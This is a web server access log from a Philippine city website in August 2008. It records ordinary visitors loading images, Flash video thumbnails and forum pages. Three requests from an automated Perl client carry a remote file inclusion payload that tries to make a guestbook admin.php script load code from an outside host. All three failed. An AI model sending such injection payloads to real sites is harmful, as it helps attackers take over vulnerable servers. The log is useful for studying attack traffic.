203.177.74.139 - - [28/Aug/2008:05:14:12 -0700] "GET /wheretoeattab1.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:12 -0700] "GET /sampo/flv/071908/9.jpg HTTP/1.1" 200 14720 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:13 -0700] "GET /whattodotab2.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:13 -0700] "GET /whattodotab1.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:14 -0700] "GET /whattoseetab2.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:14 -0700] "GET /whattoseetab1.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:14 -0700] "GET /sampo/flv/071908/10.jpg HTTP/1.1" 200 14758 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:14 -0700] "GET /sccilinksicons.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:15 -0700] "GET /360maps.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:15 -0700] "GET /sccimidline.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:16 -0700] "GET /sampo/flv/071208/1.jpg HTTP/1.1" 200 14468 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:16 -0700] "GET /sccifrontpic.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:17 -0700] "GET /qfalconbanner.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:20 -0700] "GET /sampo/flv/071208/2.jpg HTTP/1.1" 200 14471 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:20 -0700] "GET /4star.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:20 -0700] "GET /lolanitangslogofrnt.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:20 -0700] "GET /sccinewsearch.jpg HTTP/1.1" 304 - "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:21 -0700] "GET /sccisamplepage_02.gif HTTP/1.1" 200 7431 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:21 -0700] "GET /newpanmaster.png HTTP/1.1" 200 943 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:22 -0700] "GET /newpanmaster2.png HTTP/1.1" 200 927 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:23 -0700] "GET /sampo/flv/071208/3.jpg HTTP/1.1" 200 14620 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:23 -0700] "GET /sampo/Multichannel.swf HTTP/1.1" 304 - "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:24 -0700] "GET /sampo/flv/071208/4.jpg HTTP/1.1" 200 14562 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:26 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:27 -0700] "GET /sampo/flv/071208/5.jpg HTTP/1.1" 200 14429 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:28 -0700] "GET /sampo/flv/071208/6.jpg HTTP/1.1" 200 14767 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:29 -0700] "GET /sampo/flv/082008/2.jpg HTTP/1.1" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:29 -0700] "GET /sampo/flv/082008/1.jpg HTTP/1.1" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:30 -0700] "GET /sampo/flv/082008/3.jpg HTTP/1.1" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:30 -0700] "GET /sampo/flv/082008/4.jpg HTTP/1.1" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:14:30 -0700] "GET /sampo/flv/082008/5.jpg HTTP/1.1" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:31 -0700] "GET /sampo/flv/070508/1.jpg HTTP/1.1" 200 14236 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:37 -0700] "GET /sampo/flv/070508/2.jpg HTTP/1.1" 200 14215 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:38 -0700] "GET /sampo/flv/070508/3.jpg HTTP/1.1" 200 13865 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:43 -0700] "GET /sampo/flv/070508/4.jpg HTTP/1.1" 200 14008 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:46 -0700] "GET /sampo/flv/070508/5.jpg HTTP/1.1" 200 14161 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:14:47 -0700] "GET /sampo/flv/070508/6.jpg HTTP/1.1" 200 13914 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:14:47 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=972 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:14:52 -0700] "GET /forum2/index.php?s=b15de4e18038f1a5dcb319df4099b666&showtopic=58&st=0&p=972& HTTP/1.0" 200 11291 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:05 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 8798271 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:06 -0700] "GET /sphider/search.php?query=vital+edge&search=1 HTTP/1.1" 200 6886 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:15:07 -0700] "GET /forum2/index.php?act=Print&client=printer&f=12&t=231 HTTP/1.0" 200 39180 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:07 -0700] "GET /sphider/templates/standard/search.css HTTP/1.1" 200 1736 "http://www.sancarloscity.org/sphider/search.php?query=vital+edge&search=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
200.68.51.152 - - [28/Aug/2008:05:15:18 -0700] "GET /logs/access_080806.log//guestbook1//admin.php?include_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 781 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.68.51.152 - - [28/Aug/2008:05:15:18 -0700] "GET //guestbook1//admin.php?include_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:25 -0700] "GET /forum2 HTTP/1.1" 301 99 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:26 -0700] "GET /forum2/ HTTP/1.1" 200 6316 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
200.68.51.152 - - [28/Aug/2008:05:15:30 -0700] "GET /logs//guestbook1//admin.php?include_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 763 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:31 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 200 6562 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:33 -0700] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:34 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:36 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 200 4105 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:37 -0700] "GET /forum2/style_images/red_crysta/close.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:38 -0700] "GET /forum2/style_images/red_crysta/nav.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:40 -0700] "GET /forum2/style_images/red_crysta/exp_plus.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:41 -0700] "GET /forum2/style_images/red_crysta/exp_minus.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:41 -0700] "GET /forum2/style_images/red_crysta/bf_new.gif HTTP/1.1" 200 1356 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:42 -0700] "GET /forum2/style_images/red_crysta/lastpost.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:42 -0700] "GET /forum2/style_images/red_crysta/bc_queued.gif HTTP/1.1" 200 70 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:42 -0700] "GET /forum2/style_images/red_crysta/user.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:42 -0700] "GET /forum2/style_images/red_crysta/calen.gif HTTP/1.1" 200 369 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:15:43 -0700] "GET /forum2/index.php?s=1c92acb627265fe1921deeb071e74588&act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:15:53 -0700] "GET /forum2/index.php HTTP/1.0" 200 35989 "http://www.sancarloscity.org/forum2/index.php" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:03 -0700] "GET /forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9 HTTP/1.1" 200 12242 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:04 -0700] "GET /forum2/style_images/red_crysta/topic_unselected.gif HTTP/1.1" 200 70 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:05 -0700] "GET /forum2/style_images/red_crysta/newpost.gif HTTP/1.1" 200 82 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:05 -0700] "GET /forum2/style_images/red_crysta/f_hot_no_dot.gif HTTP/1.1" 200 174 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:05 -0700] "GET /forum2/style_images/red_crysta/f_norm_no_dot.gif HTTP/1.1" 200 174 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:06 -0700] "GET /sampo/flv/070508/7.jpg HTTP/1.1" 200 14245 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:06 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 4915200 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:06 -0700] "GET /sampo/flv/0704/1.jpg HTTP/1.1" 200 13869 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:06 -0700] "GET /sampo/flv/0704/2.jpg HTTP/1.1" 200 14470 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:06 -0700] "GET /forum2/style_images/red_crysta/attachicon.gif HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:06 -0700] "GET /forum2/style_images/red_crysta/pages_icon.gif HTTP/1.1" 200 94 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:07 -0700] "GET /forum2/style_images/red_crysta/f_hot_dot.gif HTTP/1.1" 200 174 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:07 -0700] "GET /sampo/flv/0704/3.jpg HTTP/1.1" 200 14131 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
